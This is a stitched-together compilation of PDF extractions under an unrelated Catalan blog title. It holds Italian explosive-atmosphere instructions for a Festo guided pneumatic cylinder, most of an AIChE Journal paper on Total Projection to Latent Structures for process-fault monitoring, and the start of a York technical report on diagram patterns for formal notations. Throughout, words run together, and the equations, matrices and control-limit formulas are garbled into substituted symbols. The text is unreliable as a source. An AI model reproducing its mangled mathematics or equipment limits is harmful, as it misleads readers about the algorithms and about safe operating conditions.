Diapositiva 1 - blogcat la xarxa de blogs de Racó Català

Traduzione delle istruzioni originali 1Marcatura EXTab. 1 2Documentazione di riferimento validaIn altri documenti, i dati tecnici relativi al prodotto possono presentare valori di­versi rispetto al presente documento. Per l'esercizio del prodotto in atmosfera esplosiva si deve fare riferimento in primo luogo ai dati tecnici del presente docu­mento.Tutti i documenti disponibili sul prodotto si trovano sul sito è/pk.3Prodotti certificatiTipoTipoDFM­12­...­B DFM­32­...­B DFM­16­...­B DFM­40­...­B DFM­20­...­B DFM­50­...­B DFM­25­...­BDFM­63­...­BTab. 24FunzionamentoAlimentando le camere del cilindro il giogo si muove avanti ed indietro. La tra­smissione di forze avviene mediante il movimento della piastra a giogo.5Sicurezza 5.1Avvertenze di sicurezza–Alle condizioni di esercizio indicate, l'unità può essere impiegata nelle zone 1e 2 a rischio di esplosione per la presenza di atmosfere gassose.–Eseguire tutti i lavori al di fuori delle zone a rischio di esplosione.–Mettere in funzione l'unità utilizzando esclusivamente un fluido di servizioadeguato è Dati tecnici.–L'impiego di altri liquidi esula dalle modalità di uso consentite.5.2Impiego ammessoL'unità viene utilizzata per il trasporto di masse e per la trasmissione di forze.6Montaggio A causa di un'installazione errata, possono verificarsi temperature elevate sulle bronzine. Le superfici calde possono creare una atmosfera esplosiva.•Provvedere ad avere una superficie di montaggio piana.•Installare l'unità in modo adeguato.•Evitare il danneggiamento delle aste di guida.7Messa in servizio La scarica di cariche elettrostatiche presenti su alcuni componenti può dare origi­ne a scintille infiammabili.•Evitare la carica elettrostatica mediante opportune misure di installazione epulizia.•Includere l’apparecchio nella compensazione equipotenziale dell’impianto.Aspirare l'aria compressa fuori da atmosfere a rischio di esplosioni. Aerosol nell'aria compressa possono generare cariche elettrostatiche.Metodo di protezione contro l'accensione: c (sicurezza costruttiva)–Considerare l'etichetta dei dati identificativi del prodotto.8Manutenzione e cura–Verificare regolarmente la funzionalità dell'unità. Intervallo: 2 milioni di cicli di movimento o al più tardi dopo 6 mesi.In caso di impiego dell'unità in ambiente inquinato o umido, la durata utile delle guide è minore.–Verificare la funzionalità delle aste di guida e del supporto a intervalli più rav­vicinati secondo le condizioni ambientali.9Eliminazione dei guastiAnomalia di funzionamentoRimedioDanni esterni rilevati durante l'ispezione visi­vaSostituire l'unitàPerdita udibileSostituire l'unitàNessuna sede fissa di fissaggioSerrare le viti di fissaggio Il giogo si sposta violentemente nella posi­zione terminaleRispettare i valori limite /Sostituire l'unitàResidui di lubrificante asciutti e saldamente attaccati sullo steloPulire lo stelo con una spugna morbida /Sostituire l'unitàComportamento di marcia irregolareRegolare l'aria di scarico con i regolatori di portata unidirezionale /Sostituire l'unitàGraffi longitudinali sullo steloSostituire l'unitàDeterioramento della qualità delle guide do­vuto all'elevato gioco del supporto sul giogo Sostituire l'unitàRumorosità aumentataSostituire l'unitàTab. 3La sostituzione dei pezzi di usura e delle parti di ricambio è possibile in singoli ca­si. Le riparazioni di questo tipo possono essere eseguite solo da personale spe­cializzato formato e autorizzato.–Contattare il consulente specializzato Festo.10Dati tecniciCondizioni d’esercizioTemperatura ambiente [°C]–20 £ T a £ +70Temperatura del fluido [°C]–20 £ T a £ +70Pressione d'esercizio [bar]10Fluido di lavoro Aria compressa a norma ISO 8573­1:2010 [5:­:­]Posizione di montaggio qualsiasiVelocità max.Carico di coppia max.Energia di impatto nelle posi­zioni terminali max. ammissi­bileCarico utile max.è/catalogueLe leghe di alluminio utilizzate contengono meno del 7,5 % di magnesio (Mg).Tab. 48099854DFM-…-B-…-EX3-…Cilindro guidato80998542018­11a [8099859]Festo SE & Co. KG Ruiter Straße 82 73734 Esslingen Germania+49 711 347­。

Total Projection to Latent Structures forProcess MonitoringDonghua Zhou and Gang LiDept.of Automation,TNList,Tsinghua University,Beijing 100084,P.R.ChinaS.Joe QinThe Mork Family Department of Chemical Engineering and Materials Science,Ming Hsieh Department of Electri-cal Engineering,University of Southern California,Los Angeles,CA 90089DOI 10.1002/aic.11977Published online August 26,2009in Wiley InterScience ()Partial least squares or projection to latent structures (PLS)has been used in multi-variate statistical process monitoring similar to principal component analysis.Stand-ard PLS often requires many components or latent variables (LVs),which contain var-iations orthogonal to Y and useless for predicting Y .Further,the X -residual of PLS usually has quite large variations,thus is not proper to monitor with the Q-statistic.To reduce false alarm and missing alarm rates of faults related to Y ,a total projection to latent structures (T-PLS)algorithm is proposed in this article.The new structure divides the X -space into four parts instead of two parts in standard PLS.The proper-ties of T-PLS are studied in detail,including its relationship to the orthogonal PLS.Further study shows the space decomposition on X -space induced by T-PLS.Fault detection policy is developed based on the T-PLS.Case studies on two simulationexamples show the effectiveness of the T-PLS based fault detection methods.VC 2009American Institute of Chemical Engineers AIChE J,56:168–178,2010Keywords:partial least squares,process monitoring,total PLS,orthogonal PLS,faultdetectionIntroductionModern industrial processes often possess a large number of measured variables,such as flow-rates,concentrations,temperatures,and pressures.Multivariate statistic process monitoring (MSPM)is effective for detecting and diagnosing faults or abnormal operating situations in many industrial processes,including chemicals,polymers,and microelec-tronics manufacturing.Two basic multivariate projection methods used in MSPM are principal component analysis (PCA)and partial least squares or projection to latent struc-tures (PLS).1–6Process monitoring using PCA or PLS is based on a predefined model built from normal process data.The major advantages of these multivariate projections aretheir ability to handle large numbers of highly correlated vari-ables,measurement errors,and missing data.Both methods are able to reduce the dimensionality of the monitoring space by projecting measurement data onto a low-dimensional latent space.1The processes are then monitored in these subspaces by utilizing multivariate control charts that reflect the infor-mation in all measured variables simultaneously.7PCA-based monitoring methods are effective in monitor-ing all the variations and abnormal situations in process vari-ables (X ).If one wants to monitor the variations in the pro-cess variables that are most influential on quality variables (Y ),one should perform a PLS decomposition on X .PLS model has been used for process monitoring in a way similar to PCA-based methods.1,8,9The basic structure and algo-rithms of PLS have been summarized in the chemometrics literature.7Correspondence concerning this article should be addressed to S.J.Qin at sqin@;or G.Li at dlg00@VC 2009American Institute of Chemical Engineers 168AIChE JournalJanuary 2010Vol.56,No.1PROCESS SYSTEMSENGINEERINGAlthough PCA-based monitoring methods are well under-stood,10PLS based methods have not been thoroughly stud-ied.MacGregor et al.7proposed the monitoring policy with multiblock PLS and showed how contribution plots were used to identify the fault variables using PLS.Nelson et al.11 considered the missing data in industrial processes and stud-ied the estimation of scores when the new observation vector had missing data,using PCA and PLS model.Westerhuis et al.12proposed the method of calculating generalized con-tribution plots in process monitoring,including PLS and PCA.Choi and Lee13defined new contribution plots of T2 for multiblock PLS.Recently,Li et al.14revealed the geo-metric properties of PLS for process monitoring and com-pared monitoring policies using various PLS.The standard PLS divides the measured variable space into two subspaces.14The typical approach is to use T2for PLS scores and Q for the X residuals.The T2index is defined by the Mahalanobis distance whereas the Q index is defined by the Euclidean distance to avoid ill-conditioning due to small eigenvalues.Although it works in many cases, monitoring in two subspaces still faces some problems.On one hand,as there are usually many process variables,PLS uses many components,which makes the predictor model difficult to interpret.These PLS components still include variations orthogonal to Y which have no contribution for predicting Y.On the other hand,the X-residuals from the PLS model are not necessarily small in covariances.There are many cases in which the X-residuals contain larger vari-ability of X than the PLS scores because PLS does not decompose the X-variations in descending order.This makes the use of Q statistic on X-residuals inappropriate.To improve the PLS model,Wold et al.15proposed the or-thogonal signal correction(OSC)method.The idea was to remove systematic information in X not correlated to Y before a PLS model was built,to obtain better models. Fearn16then reported another way of estimating the orthogo-nal components.Trygg and Wold17put forward the orthogo-nal projections to latent structures(O-PLS)based on the original nonlinear iterative partial least squares algorithm (NIPALS).The O-PLS method is a preprocessing orfiltering method to remove systematic orthogonal variation to Y from a given data set X.The standard PLS on thefiltered data can lead to simpler models.However,the above methods are regression methods,which are not designed for process monitoring.In this article,we present a total projection to latent struc-tures(T-PLS)and discuss the policy of process monitoring based on the new structure.T-PLS performs further decompo-sition both in PLS principal space and residual space.The objective for the former is to separate the orthogonal and cor-related part to Y,and that for the latter is to separate large variations from noise that has very little variation.Then we develop a new monitoring policy based on the T-PLS.The remainder of this article is organized as follows.Sec-tion on PLS for Process Monitoring reviews the PLS algo-rithm,PLS on X-space,and how to use PLS for process monitoring.Section on Total Projection to Latent Structures introduces the T-PLS algorithm and analyzes the T-PLS. Then we develop a complete monitoring policy based on T-PLS detailed in Section on T-PLS Based Fault Detection. Section on Case Study on Simulation Examples uses two simulation examples to illustrate the effectiveness of the new structure.Finally,we present conclusions in last section. PLS for Process MonitoringGiven input matrix X2R nÂm consisting of n samples with m process variables,and output matrix Y2R nÂp with p quality variables,we can use NIPALS to project(X,Y)to a low-dimensional space defined by a small number of latent variables(t1,…,t A),where A is the PLS component number. In PLS,the scaled and mean-centered X and Y are decom-posed as:X¼P Ai¼1t i p T iþE¼TP TþEY¼P Ai¼1t i q T iþF¼TQ TþF&(1)where T¼[t1,…,t A],P¼[p1,…,p A],Q¼[q1,…,q A].t i(i ¼1,…,A)are score vectors,p i(i¼1,…,A)are loading vectors for X and q i(i¼1,…,A)are loading vectors for Y.A brief NIPALS is given in Appendix A.In the NIPALS algorithm,score vectors are calculated by using weight vectors w i from deflated X data for each dimension.However,w i cannot connect t i to original X data directly.Let R¼[r1,…, r A],where r1¼w1,for i[1r i¼Y iÀ1j¼1I mÀw j p T jw i(2)With R,the score matrix T can be computed directly from original X:T¼XR(3) Furthermore,R and P have the following relation18,19:P T R¼R T P¼I A(4)In the PLS literature,the case of a single output is referred to as PLS1and that for multiple outputs is referred to as PLS2.In the general case,the number of PLS components A is usually smaller than the number of X-variables,m. Different from the PCA structure,the PLS induces an oblique projection decomposition on X space14:x¼^xþ~x^x¼PR T x2S p Span P f g~x¼IÀPR TÀÁx2S r Span Rf g?Notice that^x is not orthogonal to~x in PLS.From this geometric interpretation,^x is the projection of x onto Span{P}along Span{R}?and~x is the projection of x onto Span{R}?along Span{P}.Usually T2and Q statistics are used in PLS-based moni-toring.Given a new sample x new,wefirst calculate7:t new¼R T x new(6)~x new¼IÀPR TÀÁx new(7) then T2and Q are calculated by13:AIChE Journal January2010Vol.56,No.1Published on behalf of the AIChE DOI10.1002/aic169T 2¼t T new K À1t new$A n 2À1ðÞF A ;n ÀA ;(8)Q ¼~x new k k 2$g v 2h ;(9)where K ¼1n À1T T T :F A ;n ÀA is F-distribution with A and n ÀA degrees of freedom.g v 2h is the v 2-distribution with scaling factor g and h degrees of freedom.Total Projection to Latent StructuresPLS uses two subspaces to monitor processes,respec-tively.One is the principal subspace S p which is monitored by T 2,reflecting the major variation related to Y .The other is the residual subspace S r which is monitored by Q,reflect-ing the variation unrelated to Y .However,the principal part ^x in S p still contains many components,including variations orthogonal to Y and useless to predict Y .Another problem in process monitoring is with the standard PLS.As the pri-mary objective of PLS is to maximize the covariance between X and Y ,it does not extract the variance in the X -space in a descending order.A latter component can capture more variance in X than a previous component.After Y is best predicted with A components,the residual of X can still contain very large variability.Therefore,it is not suitable to use Q-statistic to monitor X -residual in PLS.It is necessary to decompose E further.In this section,we propose a further decomposition of PLS defined as T-PLS.We first put for-ward the T-PLS algorithm for a single output,analyze the properties of the T-PLS,then give the T-PLS algorithm for multiple outputs.T-PLS algorithm for a single output yThe T-PLS algorithm proposed here is a further decompo-sition based on the PLS algorithm.With reference to O-PLS,T-PLS can be treated as a postprocessing method to decom-pose the TP T and E in the standard PLS.The T-PLS algo-rithm for a single output y is listed in Table 1.Using the T-PLS algorithm,we can model X ,y as follows:X ¼t y p T y þT o P T o þT r P Tr þE r Y ¼t y þF&(10)where E r can be expressed as follows:E r ¼E I ÀP r P T rÀÁ(11)Compared with a PLS model,the T-PLS model is clearfor describing the measured X and suitable for monitoring different parts of X .For a single output y ,T-PLS needs only one score vector t y to predict the quality variable y ,whereas PLS1needs several score vectors t i (i ¼1,…,A ).In (10),t y is directly correlated to y in the original T ,and T o is ortho-gonal to y in the original T .T r is the main part in the origi-nal E ,and E r is the residual part in X that represents the noise.T-PLS can be simply explained in Figure 1.Properties of T-PLSLike the PLS algorithm,the orthogonality among score vectors holds for the T-PLS algorithm,which is shown in the following lemma:Lemma 1.8t i ;t j 2Cols f t y ;T o ;T r g :t T i t j ¼0;i ¼j :(12)Proof:According to the properties of PLS,T T E ¼0(13)From the T-PLS algorithm,we can gett T y ^X o¼t T yI Àt y t T y =t T y t y^X¼0(14)Thust T y T o ¼t T y ^X o P o ¼0(15)Table 1.Total PLS Algorithm for a Single Output (T-PLS)Center the columns of X,y to zero mean and scale them to unit variance.(1)Run PLSI algorithm on (X,y )to estimate TX ¼TP T þEy ¼Tq T þF&where T 2R n ÂA ,q,P,T are obtained by PLSI,A is determined by cross-validation.(2)t y ¼Tq T :(3)^X ¼TP T ;p y ¼^X T t y .t T yt y :(4)^Xo ¼^X Àt y p T y ¼T o P To ,runPCA on ^X o with A À1components.(5)E ¼T r P T r þE r ,run PCA on E with A r components,where A r \m ÀA is determined using the method by.20Figure 1.T -PLS.170DOI 10.1002/aicPublished on behalf of the AIChEJanuary 2010Vol.56,No.1AIChE JournalWith orthogonality in PCA model,t i 2T o and T r are all orthogonal to each other.Lemma 1is proven.n As we have pointed out above,T o is the orthogonal part to y in the original T .The following lemma shows the result.Lemma 2.T T o y ¼0(16)Proof:Noting thatT T o y ¼T To t yþF ÀÁ¼T T o t y þT T o F ÀÁ¼P T o ^X T o F¼P T o ^X T I Àt y t T y =t Ty t y F¼P T o ^X TF ¼P T o PT T F ¼0where T T F ¼0is a property of the PLS algorithm.Hence,t T y F ¼0and the Lemma is proven.n Relationship between T-PLS and O-PLSIn the chemometrics literature,researchers usually use multivariate calibration methods to preprocess process data X .15–17The O-PLS algorithm is one of these preprocessing methods.17The work by Verron et al.revealed other proper-ties of O-PLS,which connected the O-PLS with standard PLS.21We will show the relationship between T-PLS and O-PLS based on the above work.Let t i,k denote the i -th component extracted after removing k orthogonal compo-nents from X using O-PLS algorithm.t i þk represents the (i þk )th PLS component.Then the following relation is proven by Verron et al.21:8i >1;t i ;k ¼t i þk(17)This property of O-PLS indicates,Span T ortho ;t 1;k ÈɼSpan t 1;:::;t k þ1f g(18)where T ortho ¼[t 1,ortho ,…,t k ,ortho ]is the orthogonal scorematrix in O-PLS.With (10),we can get the following lemma:Lemma 3.8A >1,suppose that PLS takes A components collected in T ,and O-PLS takes A À1orthogonal compo-nents collected in T ortho ,thenSpan T ortho f g ¼Span T o f g(19)Proof:Noting from (18)Span T ortho ;t 1;k ÈɼSpan T f g ¼Span T o ;t yÈÉ(20)and according to the properties of O-PLS,17we haveT T ortho y ¼0(21)As rank(T ortho )¼rank(T o )¼A À1,if (19)does nothold,there must exist A linearly independent columns in [T o ,T ortho ],so that span{T ortho ,T o }¼span{T }.Then it canbe concluded from (16)and (21)that T T y ¼0,which isobviously incorrect.Thus,Lemma 3is proven.n As an inference,the following lemma holds.Lemma 4.t 1;k /t y(22)Proof:According to the properties of O-PLS,we havet T 1;k T ortho ¼0(23)and from Lemma 1,t T y T o ¼0(24)According to (20),we know t y ,t 1,k are both orthogonalcomplements of Span{T o }or Span{T ortho }with one dimen-sion.Therefore,t 1,k in O-PLS is proportional to t y in T-PLS.n Lemmas 3and 4indicate that T-PLS has the same result on the decomposition of T as the O-PLS algorithm.How-ever,T-PLS further decomposes the X -residual E ,which is useful for process monitoring.T-PLS projection structure in X-spaceT-PLS algorithm realizes the total decomposition of X space supervised by y .The following lemma describes the oblique projection structure of T-PLS:Lemma 5.The T-PLS algorithm induces an oblique decomposition on X -space :x ¼^x y þ^x o þ^x r þ^x r ^x y ¼p y qR T x C 1x 2S y^x o ¼ðP Àp y q ÞR T x C 2x 2S o ^x r ¼P r P T rI ÀPR TÀÁx C 3x 2S rp ~x r ¼I ÀP r P T rÀÁI ÀPR TÀÁx C 4x 2S rr (25)whereC 1þC 2þC 3þC 4¼I m(26)Lemma 5is proven in Appendix B.The meanings of dif-ferent subspaces are summarized in Table 2.T-PLS model does not change prediction ability of y com-pared with standard PLS model,but it decomposes X -space supervised by y .Moreover,it is easier to interpret and more precise for monitoring.From the properties of PLS and T-PLS,we can conclude that the variations in S y are most related to y and the variations in S o ,S rp are unrelated or little related to y .~x r is thought to be little related to y in standard PLS based methods.However,the last assertion about ~x r seems not quite right.PLS uses covariance to decide whether a score vector is cor-related to y .As the variance of ~x r is very small or even zero,the covariance of ~x r and y is accordingly small so that ~x r seems to be uncorrelated to y .In fact,if the correlation coefficient of ~x r and y is not zero,the output y may beAIChE JournalJanuary 2010Vol.56,No.1Published on behalf of the AIChEDOI 10.1002/aic171affected by the faults in ~x r .This can be explained by the fol-lowing example.y ¼x 1þx 2þe(27)Suppose the process is described by (27),where e is thenoise independent to x 1and x 2,x 1¼2x 2in normal situation and E (x 1)¼E (x 2)¼0,Var (x 1)¼4Var (x 2)¼4r 2.T-PLS for the above system is as follows:y ¼3ffiffi5p t þt t ¼2ffiffi5p x 1þ1ffiffi5p x 2((28)where dim(S y )¼1,dim(S o )¼0,dim(S rp )¼0,anddim(S rr )¼1.Assume there is a fault as follows:x 1x 2 !¼x Ã1x Ã2!þ1À2 !f(29)where *denotes the normal value without faults and f is thefault magnitude.It can be calculated t ¼t *,which shows that the fault happens in the residual space S rr .We can get from (27)and (28)y ¼x Ã1þx Ã2þe Àf ¼y ÃÀf~y¼y À3ffiffiffi5p t ¼y ÃÀ3ffiffiffi5p t ÃÀf ¼~y ÃÀf (30)which shows that output y is affected by the fault that happens in residual space S rr .On the other hand,if (27)is changed to:y ¼65x 1þ35x 2þe(31)The T-PLS (28)will not change,but the result (30)will change to:y ¼65x Ã1þ35x Ã2þe ¼y Ã~y¼y ÃÀ3ffiffiffi5p t ü~y Ã(32)which shows that the output y is not affected by the fault that happens in residual space S rr .Hence,~x r should be monitored for faults related to y .T-PLS for multiple outputs YThe T-PLS algorithm for multiple outputs Y is given inTable 3.X and Y can be modeled as follows:X ¼T y P T y þT o P T o þT r P Tr þE r Y ¼T y Q T y þF((33)The T-PLS for multiple outputs (T-PLS2)is basically thesame as the T-PLS for a single output (T-PLS1).The only difference is that t y in T-PLS1is replaced by T y in T-PLS2because of the nature of multiple outputs.There are three structure parameters to be decided in T-PLS2.PLS compo-nent number A is determined by cross validation.The num-ber of Y -related principal components A y ¼rank(Q )is no greater than p and A .Y-unrelated components number A r is determined using PCA-based methods.The properties of TPLS1also hold for T-PLS2,including Lemmas 1and 2,which can be proven in a similar way.The relationship between O-PLS and T-PLS for multiple outputs does not hold because O-PLS2algorithm has different pre-diction model from PLS2.The X -space is partitioned into four subspaces by T-PLS2in a similar way as shown in Lemma 5and the meaning of different parts is also the same.The proof can be more involved than T-PLS1with similar arguments.T -PLS Based Fault DetectionConventional PLS-based fault detection methods wouldplot SPE,T 2control charts described in Section on PLS for Process Monitoring to monitor a process.Under the assump-tion that latent vectors are normally distributed with zeroTable 3.Total PLS Algorithm for Multiple Outputs(T-PLS2)Center and scale the raw data to give the matrices X 2R n Âm and Y 2R n Âp .(1)Perform the PLS2algorithm on X and Y ,X ¼TP T þEy ¼Tq T þF&where T,Q,P,and R are obtained in PLS2.PLS component number A is determined by cross-validation.(2)^Y ¼TQ T ¼T y Q T y :Run PCA on ^Y with A y components,where A y ¼rank (Q ).(3)^X ¼TP T ;P T y¼T T yT yÀ1T T y^X :(4)^X o ¼^X ÀT y P T y¼T o P T o :Run PCA on ^Xo with A ÀA y components.(5)E ¼T r P T r þE r Run PCA on E with A r components,where A r \m ÀA is determined using PCA methods.Table 2.Meaning of Different SubspacesSubspace DimensionDescriptionS y 1subspace of X -space that is solely responsible in predicting yS o A À1Subspace of X -space that is explored by the PLS objective but does not predict yS rpA rsubspace of X -space that is not explored by the PLS objective,but has significant variation or excitation in X -spaceS rr m ÀA ÀA rsubspace of X -space that is not excited in the X -space of the dataTable 4.Monitoring Statistics and Control LimitsStatisticsCalculationControl LimitT 2y t T y ;new K À1y t y ;new n þ1ðÞn F 1;n À1;aT 2ot T o ;new K À1o t o ;new A À1ðÞn 2À1ðÞF A À1;n ÀA þ1;a T 2r t T r ;new K À1r t r ;newA r n 2À1ðÞn n ÀA r ðÞF A r ;n ÀA r ;aQ rk ~x r ;new k 2g v 2h ;an,number of training samples;A,number of PLS principal components;A y,number of principal components related to Y ;A r,number of components unrelated to Y .172DOI 10.1002/aicPublished on behalf of the AIChE January 2010Vol.56,No.1AIChE Journalmean,the control limits of T 2and Q can be calculated.T-PLS can also be used for monitoring in a similar way.First,we build a T-PLS model from normal historical process data X and Y .Then all scores and residuals are calculated from a new sample.Finally,several control plots are constructed with corresponding control limits,which are used for monitoring.In multivariate statistical process monitoring,two types of statistics are widely used for fault detection.These are the D-Statistic for the systematic part of the process variation and the Q-Statistic for the residual part of process variation which is also called Hotelling’s T 2and SPE statistics inPCA-based methods.In the T-PLS,^x y ;^x o ;and ^x r contain the systematic part of the process variation,thus are suitable to use D-statistics,whereas ~x r represents the residual part of the whole process variation,thus is suitable to use the Q-sta-tistic.For a new measured sample x new ,the scores and the residual part are calculated as follows:t y ;new ¼qR T x new 2R 1(34a)t o ;new¼P To P Àp y q R T x new 2R A À1(34b)t r ;new ¼P T rI ÀPR TÀÁx new 2R A r(34c)~x r ;new ¼I ÀP r P T rÀÁI ÀPR TÀÁx new 2R m (34d)Here we use T-PLS1structure to calculate the scores andresiduals and T-PLS2structure can be used similarly.Fault detection indices are constructed in Table 4.Assuming the measured sample follows a multivariate normal distribution,control limits for T 2y ;T 2o ;T 2r can be obtained using an F-dis-tribution.22On the other hand,the control limit for Q is cal-culated using a v 2distribution 22on the assumption that a re-sidual vector is multivariate normal.For D-statistics,K y ¼1n À1t Ty t y is the variance of t y which is estimated by the training samples.K o and K r are the covar-iance matrices of t o and t r .F 1;n À1;a means the value of F-dis-tribution with 1and n À1degrees at the significance level a .For the Q-statistic,g ¼S /2l and h ¼2l 2/S are estimated based on the matching moments between a g v 2h distribution and the reference distribution of Q r ,where l is the sample mean of Q r and S is the sample variance of Q r .g v 2h ;a is the critical value of the v 2variable with scaling factor g and hdegrees of freedom at significance level a .If the statistics of the new sample fall into these limits,the process is consid-ered to be in control statistically.From Figure 1and Table 4,we can state the relation between PLS and T-PLS.PLS-based monitoring method uses T 2to detect the faults related to y ,but T 2also detects faults in S o which is orthogonal to Y so that it will cause more false alarms.On the other hand,faults in S r may also affect y ,which are not detected by T 2,thus it will miss morealarms.In T-PLS,we useT 2yand Q r together to detect faults related to y,which helps to reduce rates of missing alarms and false alarms in most cases.Furthermore,PLS-based method uses Q to detect faults unrelated to y,which cannot monitor faults in S o .In T-PLS,T o ,T r,and Q r are used to-gether to detect faults unrelated to y ,which covers all the faults unrelated to y .Q r may detect incipient faults compared with Q ,because Q r has little variance in normal situations.O-PLS has the same decomposition of T as T-PLS.How-ever,as a preprocessing method,it drops the information of S o .Besides,it does not decompose the residual of PLSTable 5.PLS,A 52R P q T 0.32600.70030.32040.81920.98860.3482À0.39120.3513À0.57020.15060.60970.32720.60710.12100.6307À0.46550.6344À0.24850.05480.18140.05340.2645Table 6.T-PLS Model,A y 51,A 52,A r 51p y P o P r ~P r 0.3303À0.7128À0.3811À0.46060.22260.35040.57710.3785À0.7435À0.16570.6144À0.02630.58920.4203À0.02510.63900.3194À0.56260.23950.08370.0560À0.2371À0.21890.0315À0.9567Figure 2.T -PLS model of y .Figure 3.When fault only occurs in S o ,y is notaffected.AIChE Journal January 2010Vol.56,No.1Published on behalf of the AIChEDOI 10.1002/aic173further.Therefore,if one uses O-PLS to monitor the process,one in fact monitors faults related to y by T 2yof T-PLS and monitors faults unrelated to y by Q of PLS.Case Study on Simulation ExamplesTo demonstrate the effectiveness of T-PLS for fault detec-tion,two simulation examples are used.A numerical exampleWe first consider a synthetic numerical example without feedback as follows.x k ¼Az k þe k y k ¼Cx k þt k&(35)wherez k 2R 3;z k ;i $U ð½0;1 Þði ¼1;2;3Þ;A ¼134403014111300@1A T;e k 2R 5;e k ;j $N ð0;0:052Þðj ¼1;…;5Þ;t k $N ð0;0:12Þ;C ¼22110ðÞU ([0,1])means the uniform distribution in the interval [0,1],and N (l ,r 2)means the normal distribution with mean l and variance r 2.A fault is added in the following form:x k ¼x Ãk þN f(36)where x *is the normal value without fault,produced by (35),N is the fault direction vector,and f is the fault magnitude.We use 100samples under normal operation condition to per-form a PLS model (A ¼2)on (X,y ).The PLS components num-ber A ¼2is determined using cross validation,which offers a good prediction of y.PLS matrices are listed in Table 5.Then we perform the T-PLS1algorithm based on the PLS.As y is single,A y ¼1.We choose A r ¼1for the number of components uncorrelated to y.The T-PLS matrices are shownin Table 6,where ~Pr 2R m Âm ÀA ÀA r is the matrix of basis vec-tors of S rr ,which consists of all left singular vectors of (I ÀP r P T r )(I ÀPR T)related to nonzero singular values.T-PLS has the same prediction as PLS.Output y is esti-mated by the model (10)and shown in Figure 2.One hun-dred faulty samples,produced by (36),are used for fault detection per time.We compare the fault detection using standard PLS and T-PLS,under various fault cases.IntheFigure 5.T -PLS based monitoring when fault occurs inS o only,f 53.Figure4.PLS based monitoring when fault occurs inS o only,f 53.Figure 6.When fault occurs in S rr only,y is affected.F PLS (T 2)T ÀPLS ðT 2y or Q r ÞPCA (T 2)PCA (Q )112.0 2.882.3274.4 1.468.9 1.1399.82.098.91.7174DOI 10.1002/aicPublished on behalf of the AIChEJanuary 2010Vol.56,No.1AIChE Journal。

Diagram Patterns and Meta-patterns to support formal modellingwith instantiations for B,CSP,Z,Circus,and CSP||BSusan Stepney,Fiona Polack,and Ian ToynUniversity of York Technical Report YCS-2005-39417October2005AbstractWe present a pattern-based approach to depicting the structure of formal spec-ifications.We propose a diagram meta-pattern,and instantiate it to produce a number of diagrammatic patterns for formal notations including B,CSP,and Z, and composite notations Circus and CSP||B.The ultimate objective is to support practical use and reuse of specifications and their documentation.Contents1Introduction11.1Diagrams are useful11.2Patterns21.3Meta-concepts for diagrams31.4Meta-pattern ideas5 2Application of Diagram Patterns to B8 3Application of Diagram Patterns to CSP123.1Processes:state transitions133.2Processes:communication channels163.3Processes:full diagrams18 4Application of Diagram Patterns to Z224.1Z graphical notation224.2The Delta/Xi pattern234.3The Delta/Xi pattern,State Transition viewpoint274.4The Promotion pattern294.5The Morph pattern30 5Application of Diagram Patterns to Circus33 6Application of Diagram Patterns to CSP||B35 7Conclusions38A Bibliography40B CSP Example45C Z Delta/Xi pattern diagram illustrations49iii Contents D Z Morph pattern diagram illustrations54Chapter1IntroductionThis paper is part of ongoing research on making formal techniques of software de-velopment practically applicable.It brings together pattern concepts that address the need for systematic,repeatable approaches to such developments,with forms of illustration that can be used to summarise and explain formal text.1.1Diagrams are usefulWe start from the observation that many peoplefind diagrams useful to help them understand complex structures.We introduce patterns that can be used to produce diagrams that are helpful abstractions of the formal text,and that can help to illustrate structure not im-mediately visible from the text.These are the kinds of diagrams people sketch for themselves when trying to understand a new concept in the formal text or formal model;in some cases,authors already provide these kinds of illustrations.There are numerous kinds of model in a computer system development,repre-senting different stages of development,different aspects of the system,different viewpoints,and different approaches to modelling.Diagrams can be used to sum-marise the structure of the formal model,to emphasise important parts of the model,whether structurally(the core or current focus of the formal text),or in terms of the domain modelled(for example,a controlling part of the system,the critical security or safety aspects of the system,or certain functionality).In a diagram,it is easier than in formal text to apply typographic tricks to place or reduce emphasis,by,for example,use of scale,colour or shading–this is evident in computer-based presentations where current focus is highlighted visually using colour variations etc.Our diagrams are treated as part of the informal supporting12Chapter1.Introduction commentary;they are not automatically generated from the formal text.(This should be contrasted with approaches where the diagrams themselves have‘rigor-ous’interpretations,for example,UML.)The author chooses which elements to emphasise,and which to elide,the better to explain the formal text to the reader. Such diagrams can also contribute to the development process.An infelicity in the appearance of a diagram may indicate a corresponding infelicity in the structure of a model.If a diagram is produced after the model is completed(as is the case of all the examples in this paper),the result may indicate a refactoring opportu-nity:a chance to improve the model during subsequent development[Fowler1999], [Stepney et al.2002].1.2PatternsThe concept of patterns[Alexander et al.1977]is increasingly used in computer systems analysis and development[Fowler1997],[Gamma et al.1995],[Coplien& Schmidt1995],[Martin et al.1998].Patterns are characteristics of models that engineers wish to highlight.Sometimes a pattern is borrowed from another devel-opment(directly or via a pattern catalogue);sometimes it is simply a metaphor for a section of a one-offdesign–it may subsequently become a catalogued or reused pattern.As with any work on patterns,this paper offers a new presentation of existing material.Existing concepts are applied to known formal idioms and structures, and general conclusions drawn that are of relevance to wider work on patterns and their representation,as well as for the practical use of formality.Our experience of formal modelling indicates that patterns make formal modelling more practically attractive and help in the development of commercially-relevant support tools for formal specification,formal analysis,and formal development [Stepney et al.2003a],[Stepney et al.2003b],[Stepney et al.2003c],[Valentine et al.2004].Diagrams are visual aids to representation or understanding of models. Our experience with software engineering patterns suggests that diagrammatic visualisations are a useful part of pattern descriptions,helping to record how the patterns are used.Our goal is,therefore,to identify diagrammatic representations for the identified formal patterns.Our work on diagrams and diagram patterns for formal methods indicates that many of the desirable characteristics of the diagram patterns are also desirable1.3Meta-concepts for diagrams3specification supporting documentationformal schema:Z scope proof trees etcinformal diagram patternsTable1.1Examples of formal and informal diagrams used in the specifica-tion,or the supporting documentationItem RelationshipUML class diagram classes associations,inheritanceUML sequence diagrams objects,messages temporal orderUML activity diagrams activities temporal ordering andflow Cleanroom diagrams functions stimuli and responsesJackson structures states decomposition,temporal order Venn diagram sets union,intersection,etcrefinement square states operations,retrieve relation Table1.2Examples of abstract items and relationshipscharacteristics in other areas of system modelling.The use of diagrams with for-mality must be undertaken in an informed way;this is equally true where concepts specified diagrammatically are re-engineered into formal descriptions.Table1.1 summarises the potential interactions of formal text and diagrams.We present many existing diagramming concepts and styles as patterns;we also introduce a few new contributions for the various formal notations.1.3Meta-concepts for diagramsMany diagrams express two concepts of interest:the items,and the relationships between them.Table1.2gives abstract syntactic components of some common diagrams.In general,a suitable notation can be designed by deciding a graphical representation for the items and the relationships.Table1.3gives some well-known concrete syntactic representations.We use 